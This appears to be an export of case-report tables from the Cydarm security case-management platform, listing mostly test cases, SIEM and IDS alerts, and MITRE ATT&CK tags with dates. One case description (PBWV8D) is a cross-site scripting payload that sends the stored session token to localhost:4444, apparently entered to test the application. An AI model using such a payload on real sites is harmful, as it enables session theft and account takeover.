+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| S8KV4P      | Cydarm           | Totally New Case                                                                                                                   |              | Closed     |                                                                               | 2020-03-06 06:45:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| PBWV8D      | Cydarm           | asdf<img src=/ onerror="fetch\('http://localhost:4444', {method: 'POST', body: localStorage.getItem\('cydarm-session-token'\)}\)"> |              | Closed     | mitre-attack:t1192-spearphishing_link                                         | 2020-02-05 00:17:00 | 2020-03-23 01:03:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| L03UHH      | Cydarm           | wtaf                                                                                                                               |              | Closed     |                                                                               | 2020-04-06 15:29:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 9XBELT      | Cydarm           | hello there                                                                                                                        |              | Closed     |                                                                               | 2020-04-12 19:28:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| MZKVMN      | Cydarm           | Totally New Case                                                                                                                   |              | Closed     |                                                                               | 2020-03-06 06:45:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| RV4HGS      | Cydarm           | SANS blocklist - Threat - Source And Destination Matches - Threat Gen \(threatlist\) - 196.52.43.103                               |              | Closed     |                                                                               | 2020-04-19 17:13:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| MFM5FE      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-03-23 06:27:00 | 2020-03-23 22:21:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 3FW4ZM      | Cydarm           | triggers                                                                                                                           |              | Closed     |                                                                               | 2020-03-25 23:39:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| CT8S36      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-03-23 18:48:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 8FP23G      | Cydarm           | Combined attack                                                                                                                    |              | Closed     | mitre-attack:t1194-spearphishing_via_service                                  | 2020-04-29 00:37:00 | 2020-04-29 01:25:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1195-supply_chain_compromise                                    |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | gtest                                                                         |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1119-automated_collection                                       |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | A test                                                                        |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| PGCJY9      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     | mitre-attack:t1491-defacement                                                 | 2020-03-23 18:53:00 | 2020-04-28 15:24:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 38C3JG      | Cydarm           | fortigate event 1                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:30:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 8XJ4EV      | Cydarm           | hello                                                                                                                              |              | Closed     |                                                                               | 2020-04-12 19:21:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZQLGJE      | Cydarm           | fortigate event 0                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:30:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| JAU9LJ      | Cydarm           | cortex-stix-test                                                                                                                   |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-02-21 04:54:00 | 2020-02-25 02:46:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 92LJAA      | Cydarm           | functional test                                                                                                                    |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-02-21 21:43:00 | 2020-03-05 12:22:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1193-spearphishing_attachment                                   |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1192-spearphishing_link                                         |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZGKC7L      | Cydarm           | ET SCAN Suspicious inbound to Oracle SQL port 1521  - \(1vTH62kB4npTB-ZoqeBw\) - 10.20.0.235                                       |              | Closed     |                                                                               | 2019-12-09 23:29:00 | 2020-05-03 08:18:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 09CDA4      | Cydarm           | SANS blocklist - Threat - Source And Destination Matches - Threat Gen \(threatlist\) - 196.52.43.103                               |              | Closed     | mitre-attack:t1490-inhibit_system_recovery                                    | 2019-12-09 23:31:00 | 2020-02-05 01:59:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1077-windows_admin_shares                                       |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1141-input_prompt                                               |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1182-appcert_dlls                                               |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1211-exploitation_for_defense_evasion                           |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1115-clipboard_data                                             |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 4CQ7GA      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-04-19 17:07:00 | 2020-04-29 00:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 6J61UQ      | Cydarm           | fortigate event 7                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:31:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| JPHUZG      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-04-19 17:13:00 | 2020-04-29 00:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| SR4B7Q      | Cydarm           | ET SCAN Suspicious inbound to mySQL port 3306  - \(D_TF62kB4npTB-Zo99zA\) - 10.20.0.235                                            |              | Closed     |                                                                               | 2019-12-09 23:29:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| WQZF4D      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-04-19 17:13:00 | 2020-04-29 00:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| RLVDM2      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-04-19 17:13:00 | 2020-04-29 00:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZXXB4M      | Cydarm           | fortigate event 9.4                                                                                                                |              | Closed     | mitre-pre-attack:t1359-test_malware_to_evade_detection                        | 2019-12-09 23:31:00 | 2020-02-03 11:31:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| L3W8VA      | Cydarm           | hello there                                                                                                                        |              | Closed     |                                                                               | 2020-04-12 19:28:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| SVEF4M      | Cydarm           | fortigate event 8                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:31:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| K28RPC      | Cydarm           | fortigate event 3                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:31:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| J5H9EK      | Cydarm           | fortigate event 4                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:31:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| GNZAU3      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-04-19 17:13:00 | 2020-04-29 00:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 4BFCKH      | Cydarm           | fortigate event 6                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:31:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| Y2156W      | Cydarm           | fortigate event 5                                                                                                                  |              | Closed     | mitre-attack:t1501-systemd_service                                            | 2019-12-09 23:31:00 | 2020-05-05 04:36:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 38GP12      | Cydarm           | test 9/12 JP xx                                                                                                                    |              | Closed     | sometag                                                                       | 2020-12-09 01:09:00 | 2021-09-21 04:10:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1100-web_shell                                                  |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 1HXN0G      | Cydarm           | Message Center Major Change Update Notification                                                                                    |              | Closed     | reviewed                                                                      | 2020-06-28 10:37:00 | 2020-06-28 10:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| QNP6GA      | Cydarm           | GB new case                                                                                                                        |              | Closed     |                                                                               | 2020-10-06 23:06:00 | 2020-10-06 23:06:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 9MU3GT      | Cydarm           | SOC Team Case                                                                                                                      |              | Closed     | mitre-attack:t1192-spearphishing_link                                         | 2020-05-13 00:56:00 | 2020-05-13 01:21:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-pre-attack:t1361-test_signature_detection_for_file_upload_email_filters |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1494-runtime_data_manipulation                                  |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| M1AR2C      | Cydarm           | Someone received a suspicious email                                                                                                |              | Closed     | mitre-attack:t1192-spearphishing_link                                         | 2019-12-12 02:52:00 | 2020-02-04 13:31:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| X72P5L      | Cydarm           | this is a new test case                                                                                                            |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-06-09 12:29:00 | 2020-06-09 16:33:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1192-spearphishing_link                                         |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| LM87M0      | Cydarm           | Spearphishing attack                                                                                                               |              | Closed     | mitre-attack:t1132-data_encoding                                              | 2020-04-27 05:46:00 | 2020-05-05 04:36:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1193-spearphishing_attachment                                   |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 0ZEVD5      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(ipconfig.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-13 13:01:00 | 2020-12-13 13:01:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 5A9464      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(icacls.exe\). A Deny Policy Action was applied          |              | Closed     |                                                                               | 2020-12-13 13:22:00 | 2020-12-13 13:22:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 96J7B3      | Cydarm           | IDS network traffic: NETBIOS SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt                                 |              | Closed     |                                                                               | 2020-12-13 12:27:00 | 2020-12-13 12:27:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| QVTDL2      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(psexec.exe\). A Deny Policy Action was applied          |              | Closed     |                                                                               | 2020-12-13 12:41:00 | 2020-12-13 12:41:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| HBLEXZ      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(pscp.exe\). A Deny Policy Action was applied            |              | Closed     |                                                                               | 2020-12-13 13:06:00 | 2020-12-13 13:06:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| WUT80L      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     | reviewed                                                                      | 2020-12-13 11:20:00 | 2020-12-13 11:20:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| MPCZ8N      | Cydarm           | IDS network traffic: PROTOCOL-POP CAPA overflow attempt                                                                            |              | Closed     | reviewed                                                                      | 2020-12-13 11:05:00 | 2020-12-13 11:05:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| U6PP9V      | Cydarm           | dodgy IPs                                                                                                                          |              | Closed     |                                                                               | 2020-12-12 11:01:00 | 2020-12-12 11:01:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ALLUXV      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(hostname.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-13 13:46:00 | 2020-12-13 13:46:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| YY1FXF      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(certutil.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-13 13:42:00 | 2020-12-13 13:42:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| MPR6ZP      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(ssh.exe\). A Deny Policy Action was applied             |              | Closed     |                                                                               | 2020-12-13 13:37:00 | 2020-12-13 13:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| E1J496      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(icacls.exe\). A Deny Policy Action was applied          |              | Closed     |                                                                               | 2020-12-13 13:12:00 | 2020-12-13 13:12:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| PRVEWR      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(taskkill.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-13 13:15:00 | 2020-12-13 13:15:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| E5HBS8      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-12-13 11:46:00 | 2020-12-13 11:46:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| XW35M8      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-12-13 11:33:00 | 2020-12-13 11:33:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| U2ZRU1      | Cydarm           | test file uploads                                                                                                                  |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-12-11 02:37:00 | 2020-12-11 02:37:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| Z6VVN8      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-12-13 12:13:00 | 2020-12-13 12:13:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| P801ZG      | Cydarm           | Test test test                                                                                                                     |              | Closed     | mitre-attack:t1192-spearphishing_link                                         | 2020-10-11 21:50:00 | 2020-10-11 22:14:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1119-automated_collection                                       |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1100-web_shell                                                  |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| RY12J8      | Cydarm           | IDS network traffic: NETBIOS SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt                                         |              | Closed     |                                                                               | 2020-11-25 12:58:00 | 2020-11-25 12:58:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 4CLUWK      | Cydarm           | Playbook to case test                                                                                                              |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-10-07 00:02:00 | 2020-10-07 00:02:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 52NXD0      | Cydarm           | IDS network traffic: PROTOCOL-FTP .forward                                                                                         |              | Closed     |                                                                               | 2020-10-30 02:12:00 | 2020-10-30 02:12:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| HTYTHE      | Cydarm           | CB Protection Alert: scheduler__cydarm__search__RMD586dcd55ed764bbd9_at_1604020514586                                              |              | Closed     |                                                                               | 2020-10-30 02:03:00 | 2020-10-30 02:03:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 83TM9S      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(robocopy.exe\). A Deny Policy Action was applied        |              | Closed     |                                                                               | 2020-12-07 12:38:00 | 2020-12-07 12:38:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 3QTQYZ      | Cydarm           | rm-931                                                                                                                             |              | Closed     |                                                                               | 2020-11-10 13:07:00 | 2020-11-10 13:07:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| A5HUT7      | Cydarm           | New Test Case                                                                                                                      |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-11-12 02:52:00 | 2020-11-12 02:52:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 7215NJ      | Cydarm           | Test STIX parser                                                                                                                   |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-07-20 05:43:00 | 2020-07-20 05:43:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZQ26DD      | Cydarm           | structured data test                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-12-06 12:33:00 | 2020-12-06 12:33:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| BYCLZH      | Cydarm           | testsss                                                                                                                            |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-10-14 22:35:00 | 2020-10-14 22:35:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 3L6D0Z      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-10-11 13:32:00 | 2020-10-11 13:32:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| URYS17      | Cydarm           | new cydarm case                                                                                                                    |              | Closed     |                                                                               | 2020-10-11 13:56:00 | 2020-10-11 13:56:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| WHFPDT      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-10-09 03:04:00 | 2020-10-09 03:04:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| EA8T8C      | Cydarm           | Structured data test                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-10-06 23:49:00 | 2020-10-06 23:49:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1119-automated_collection                                       |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| M9DFR8      | Cydarm           | Splunk alert: The application powershell.exe invoked another application \(ping.exe\). A Deny Policy Action was applied            |              | Closed     |                                                                               | 2020-11-25 13:13:00 | 2020-11-25 13:13:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| NVDKT7      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-11-25 13:11:00 | 2020-11-25 13:11:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| ZNKWV4      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-09-23 13:51:00 | 2020-09-23 13:51:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 3HUPM1      | Cydarm           | New data received via webhook                                                                                                      |              | Closed     |                                                                               | 2020-09-23 13:47:00 | 2020-09-23 13:47:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 0D2HME      | Cydarm           | another SLA check                                                                                                                  |              | Closed     |                                                                               | 2020-05-08 02:53:00 | 2020-05-08 03:00:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 963S6F      | Cydarm           | test SLA2                                                                                                                          |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-05-03 04:58:00 | 2020-05-03 08:25:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| FWLEZ9      | Cydarm           | Another new case, better this time?                                                                                                |              | Closed     |                                                                               | 2020-05-05 05:10:00 | 2020-05-05 05:12:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| R1MEV5      | Cydarm           | Test Case 234                                                                                                                      |              | Closed     | mitre-attack:t1100-web_shell                                                  | 2020-09-17 03:24:00 | 2021-05-25 02:51:00 |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1206-sudo_caching                                               |                     |                     |                       |
|             |                  |                                                                                                                                    |              |            | mitre-attack:t1491-defacement                                                 |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| UUMGWR      | Cydarm           | Totally New Case                                                                                                                   |              | Closed     |                                                                               | 2020-03-06 06:45:00 | 2020-03-15 09:54:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| J9B78W      | Cydarm           | another SLA check                                                                                                                  |              | Closed     |                                                                               | 2020-05-08 02:50:00 | 2020-05-08 02:52:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| 4BNQDP      | Cydarm           | New Case                                                                                                                           |              | Closed     | mitre-attack:t1006-file_system_logical_offsets                                | 2020-03-06 06:38:00 | 2020-03-06 06:38:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+
| TZ0U0U      | Cydarm           | another new case                                                                                                                   |              | Closed     |                                                                               | 2020-06-09 16:33:00 | 2020-06-09 16:35:00 |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+-------------------------------------------------------------------------------+---------------------+---------------------+-----------------------+ 

Table:Table 6: Cases opened during this reporting period and in a closed state at the end of this reporting period. 

+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| **Locator** | **Organisation** | **Description**                                                                                                                                                        | **Severity** | **Status** | **Tag**                                        | **Opened**          | **Closed**          | **Total Age of Case** |
+=============+==================+========================================================================================================================================================================+==============+============+================================================+=====================+=====================+=======================+
| AKPE1U      | Cydarm           | stix                                                                                                                                                                   |              | Closed     |                                                | 2021-04-27 08:03:00 | 2021-05-05 01:58:00 | 7d 17h 55m 24s        |
